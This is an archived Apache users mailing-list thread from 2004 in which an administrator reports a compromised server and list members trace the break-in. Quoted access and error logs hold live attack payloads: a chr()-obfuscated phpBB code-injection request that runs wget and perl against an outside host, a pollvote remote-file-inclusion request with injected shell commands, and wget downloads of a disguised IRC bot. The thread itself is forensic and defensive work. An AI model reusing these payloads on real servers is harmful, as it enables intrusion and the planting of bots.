You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Arthur Kerpician <ar...@bluechip.ro> on 2004/12/04 00:05:42 UTC
[users@httpd] Security issue with 2.0.50
Hi all,
A few days ago I noticed a problem which I didn't encountered in over 2
years of using apache! On my apache 2.0.50 / mod_ssl / php 4.3.8 server
someone could write in my /tmp directory (or download files as you can
see from the logs bellow) and execute processes under common used names
(qmail-remote, httpd etc). Most of these processes opened remote
connections on port 6667 and, as I further saw, were used for a psybnc
(which I really don't know what it does except that is used on IRC).
This is a part from the error_log:
------------------------------------------------------------------------------------------
[Tue Nov 30 11:13:09 2004] [notice] Apache/2.0.50 (Unix) mod_ssl/2.0.50
OpenSSL/0.9.7a PHP/4.3.8 configured -- resuming normal
sh: line 1: a.html: Permission denied
sh: line 1: a.html: Permission denied
--11:38:45-- http://security.cnc.net/bind.tgz
=> `bind.tgz'
Resolving security.cnc.net... done.
Connecting to security.cnc.net[207.155.252.37]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
11:38:46 ERROR 404: Not Found.
mkdir: cannot create directory `.a': File exists
--11:38:46-- http://security.cnc.net/bind.tgz
=> `bind.tgz'
Resolving security.cnc.net... done.
Connecting to security.cnc.net[207.155.252.70]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
11:38:47 ERROR 404: Not Found.
--22:56:25-- http://www.security.cnc.net/qmail.tgz
=> `qmail.tgz'
Resolving www.security.cnc.net... done.
Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211,097 [application/x-compressed]
0K .......... .......... .......... .......... .......... 24%
46.82 KB/s
50K .......... .......... .......... .......... .......... 48%
77.16 KB/s
100K .......... .......... .......... .......... .......... 72%
62.27 KB/s
150K .......... .......... .......... .......... .......... 97%
75.30 KB/s
200K ...... 100%
192.17 KB/s
22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
------------------------------------------------------------------------------------------
Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until now
everything's ok but if somebody can explain what was I experienced I'd
be gratefull. I read on some sites about a worm exploiting a
vulnerability in OpenSSL but I'm not sure if that's the case.
Thanks for any replies,
Arthur
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security issue with 2.0.50
Posted by Shannon Eric Peevey <sp...@unt.edu>.
Arthur Kerpician wrote:
>>
> I got to the bottom of it and this is what I had found:
> forum.protected.com-access_log:200.140.216.79 - -
> [04/Dec/2004:06:55:54 +0200] "GET
> /viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527
> HTTP/1.0" 200 13994
>
> It seems that the gateway for my server's vulnerability was
> phpBB-2.0.4. If convert the ascii in the url to chars it will give you
> this:
> echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
> Eric, you were right by giving me the example with pollvote...that
> made me look into all sites' logs hosted on that server. The forum was
> the only site which recorded this kind of requests (I did a `grep
> /www/logs/*access_log* echr` on all access logs). There were several
> records like the one above with IP's coming from Brazil, Dominican
> Republic, Spain, Germany, AOL...I guess untraceable proxys.
>
> I upgraded today to phpBB-2.0.11, the latest stable release tagged by
> the authors as "critical update". Thanks all for your fast replies,
> I'll keep posting on the subject if the matter isn't solved.
>
Arthur,
Great!! Yeah, there are all kinds of SQL injection issues in
phpBB-2.0.10, so its good you have 2.0.11 installed now. I know this is
an Apache list, but should follow this up with the location of the patch
for anyone that is not able to upgrade to phpBB-2.0.11 yet:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
Ivan, if you see how phpBB2 is dealing with safe_mode=On, they have you
create a tmp dir under the bulletin board root chmod'd to 777... You're
guess is as good as mine as to the actual security of this fix. It
seems to me that safe_mode is still largely ignored by many PHP
application developers, (photo galleries in particular), so it might not
be feasible to run your application in safe_mode. I didn't explore the
exact vulnerability in pollvote.php, but I assume it must be a weakness
form validation.
see ya'll,
--
Shannon Eric Peevey => "speeves"
Dyno-Mite! System Administrator => speeves@unt.edu
Central Web Support => (940) 369-8876
University of North Texas => http://web2.unt.edu
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security issue with 2.0.50
Posted by Arthur Kerpician <ar...@bluechip.ro>.
Shannon Eric Peevey wrote:
>
>>> --22:56:25-- http://www.security.cnc.net/qmail.tgz
>>> => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>> 0K .......... .......... .......... .......... .......... 24%
>>> 46.82 KB/s
>>> 50K .......... .......... .......... .......... .......... 48%
>>> 77.16 KB/s
>>> 100K .......... .......... .......... .......... .......... 72%
>>> 62.27 KB/s
>>> 150K .......... .......... .......... .......... .......... 97%
>>> 75.30 KB/s
>>> 200K ...... 100%
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ------------------------------------------------------------------------------------------
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until
>>> now everything's ok but if somebody can explain what was I
>>> experienced I'd be gratefull. I read on some sites about a worm
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
>
> http://www.energymech.net/
>
> It seems like IRC bots, bombs, etc., are about the most popular uses
> for these types of hacks.
> First, I would rebuild the machine, (After you do some forensic
> analysis, of course :) ). I agree with Ivan on this, though it could
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file
> upload vulnerability:
>
> http://securityfocus.net/bid/11190/info/
>
> I would look through your apache logs for shell commands, such as
> wget, ls, etc., and you might be able to trace the exact vulnerability
> that these people used. Here is an example from a machine that was
> exploited with a safe_mode=off exploit:
>
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET
> /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1)" 1101/3049 (36%)
>
> You'll notice the commands after 'cmd='. (Exploiting a file in the
> pollvote application).
>
> Let me know what you find. (Contact me offlist, if you would like
> some help).
>
> thanks,
>
I got to the bottom of it and this is what I had found:
forum.protected.com-access_log:200.140.216.79 - - [04/Dec/2004:06:55:54
+0200] "GET
/viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527
HTTP/1.0" 200 13994
It seems that the gateway for my server's vulnerability was phpBB-2.0.4.
If convert the ascii in the url to chars it will give you this:
echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
Eric, you were right by giving me the example with pollvote...that made
me look into all sites' logs hosted on that server. The forum was the
only site which recorded this kind of requests (I did a `grep
/www/logs/*access_log* echr` on all access logs). There were several
records like the one above with IP's coming from Brazil, Dominican
Republic, Spain, Germany, AOL...I guess untraceable proxys.
I upgraded today to phpBB-2.0.11, the latest stable release tagged by
the authors as "critical update". Thanks all for your fast replies, I'll
keep posting on the subject if the matter isn't solved.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security issue with 2.0.50
Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
Hi
Glad we agree :P
Following the safe_mode = off issue. a friend of mine, is using some
kind of "online shop service" (dont know which one), and whenever we try
to put safe_mode=on the shop says that it cant access tmp dir (/tmp) to
use sessions and other stuff.
I tried creating and configuring a user-local tmp dir, with no luck
(obviously modifying the source code).
I think this is a coding problem, but he dont want to recode the system
(tipycal user excuse "it worked before"). Any hints ?
Well, any pointers will be well received :)
Be Excellent to each others !!
Shannon Eric Peevey wrote:
>
>>> --22:56:25-- http://www.security.cnc.net/qmail.tgz
>>> => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>> 0K .......... .......... .......... .......... .......... 24%
>>> 46.82 KB/s
>>> 50K .......... .......... .......... .......... .......... 48%
>>> 77.16 KB/s
>>> 100K .......... .......... .......... .......... .......... 72%
>>> 62.27 KB/s
>>> 150K .......... .......... .......... .......... .......... 97%
>>> 75.30 KB/s
>>> 200K ...... 100%
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ------------------------------------------------------------------------------------------
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until
>>> now everything's ok but if somebody can explain what was I
>>> experienced I'd be gratefull. I read on some sites about a worm
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
>
> http://www.energymech.net/
>
> It seems like IRC bots, bombs, etc., are about the most popular uses for
> these types of hacks.
> First, I would rebuild the machine, (After you do some forensic
> analysis, of course :) ). I agree with Ivan on this, though it could
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload
> vulnerability:
>
> http://securityfocus.net/bid/11190/info/
>
> I would look through your apache logs for shell commands, such as wget,
> ls, etc., and you might be able to trace the exact vulnerability that
> these people used. Here is an example from a machine that was exploited
> with a safe_mode=off exploit:
>
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET
> /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1)" 1101/3049 (36%)
>
> You'll notice the commands after 'cmd='. (Exploiting a file in the
> pollvote application).
>
> Let me know what you find. (Contact me offlist, if you would like some
> help).
>
> thanks,
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security issue with 2.0.50
Posted by Shannon Eric Peevey <sp...@unt.edu>.
>> --22:56:25-- http://www.security.cnc.net/qmail.tgz
>> => `qmail.tgz'
>> Resolving www.security.cnc.net... done.
>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 211,097 [application/x-compressed]
>>
>> 0K .......... .......... .......... .......... .......... 24%
>> 46.82 KB/s
>> 50K .......... .......... .......... .......... .......... 48%
>> 77.16 KB/s
>> 100K .......... .......... .......... .......... .......... 72%
>> 62.27 KB/s
>> 150K .......... .......... .......... .......... .......... 97%
>> 75.30 KB/s
>> 200K ...... 100%
>> 192.17 KB/s
>>
>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>> ------------------------------------------------------------------------------------------
>>
>>
>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until
>> now everything's ok but if somebody can explain what was I
>> experienced I'd be gratefull. I read on some sites about a worm
>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the
>> case.
>
I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
http://www.energymech.net/
It seems like IRC bots, bombs, etc., are about the most popular uses for
these types of hacks.
First, I would rebuild the machine, (After you do some forensic
analysis, of course :) ). I agree with Ivan on this, though it could
also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload
vulnerability:
http://securityfocus.net/bid/11190/info/
I would look through your apache logs for shell commands, such as wget,
ls, etc., and you might be able to trace the exact vulnerability that
these people used. Here is an example from a machine that was exploited
with a safe_mode=off exploit:
access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET
/pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a
HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)" 1101/3049 (36%)
You'll notice the commands after 'cmd='. (Exploiting a file in the
pollvote application).
Let me know what you find. (Contact me offlist, if you would like some
help).
thanks,
--
Shannon Eric Peevey => "speeves"
Dyno-Mite! System Administrator => speeves@unt.edu
Central Web Support => (940) 369-8876
University of North Texas => http://web2.unt.edu
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Security issue with 2.0.50
Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
That's not apache. (im pretty sure...) Thats a insecure php (register
globals on probably) and someone used a "code inject" on you.
Php Nuke's mods usually are vulnerable to that.
After the code injection, the script kiddie need a place to put ,
uncompress and run the software he uploaded.. usually /tmp /var/tmp
/dev/shm .. etc..
How to secure this ?
in php.ini register globals MUST be off. /tmp should not be able to exec
stuff (i usually link /var/tmp and /usr/tmp to /tmp, and mount tmp as
noexec)
I may be wrong about it is php.. but that's how they run sw on your machine.
Arthur Kerpician wrote:
> Hi all,
> A few days ago I noticed a problem which I didn't encountered in over 2
> years of using apache! On my apache 2.0.50 / mod_ssl / php 4.3.8 server
> someone could write in my /tmp directory (or download files as you can
> see from the logs bellow) and execute processes under common used names
> (qmail-remote, httpd etc). Most of these processes opened remote
> connections on port 6667 and, as I further saw, were used for a psybnc
> (which I really don't know what it does except that is used on IRC).
> This is a part from the error_log:
> ------------------------------------------------------------------------------------------
>
> [Tue Nov 30 11:13:09 2004] [notice] Apache/2.0.50 (Unix) mod_ssl/2.0.50
> OpenSSL/0.9.7a PHP/4.3.8 configured -- resuming normal
> sh: line 1: a.html: Permission denied
> sh: line 1: a.html: Permission denied
> --11:38:45-- http://security.cnc.net/bind.tgz
> => `bind.tgz'
> Resolving security.cnc.net... done.
> Connecting to security.cnc.net[207.155.252.37]:80... connected.
> HTTP request sent, awaiting response... 404 Not Found
> 11:38:46 ERROR 404: Not Found.
>
> mkdir: cannot create directory `.a': File exists
> --11:38:46-- http://security.cnc.net/bind.tgz
> => `bind.tgz'
> Resolving security.cnc.net... done.
> Connecting to security.cnc.net[207.155.252.70]:80... connected.
> HTTP request sent, awaiting response... 404 Not Found
> 11:38:47 ERROR 404: Not Found.
>
> --22:56:25-- http://www.security.cnc.net/qmail.tgz
> => `qmail.tgz'
> Resolving www.security.cnc.net... done.
> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 211,097 [application/x-compressed]
>
> 0K .......... .......... .......... .......... .......... 24% 46.82
> KB/s
> 50K .......... .......... .......... .......... .......... 48% 77.16
> KB/s
> 100K .......... .......... .......... .......... .......... 72% 62.27
> KB/s
> 150K .......... .......... .......... .......... .......... 97% 75.30
> KB/s
> 200K ...... 100% 192.17
> KB/s
>
> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
> ------------------------------------------------------------------------------------------
>
>
> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until now
> everything's ok but if somebody can explain what was I experienced I'd
> be gratefull. I read on some sites about a worm exploiting a
> vulnerability in OpenSSL but I'm not sure if that's the case.
>
> Thanks for any replies,
> Arthur
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org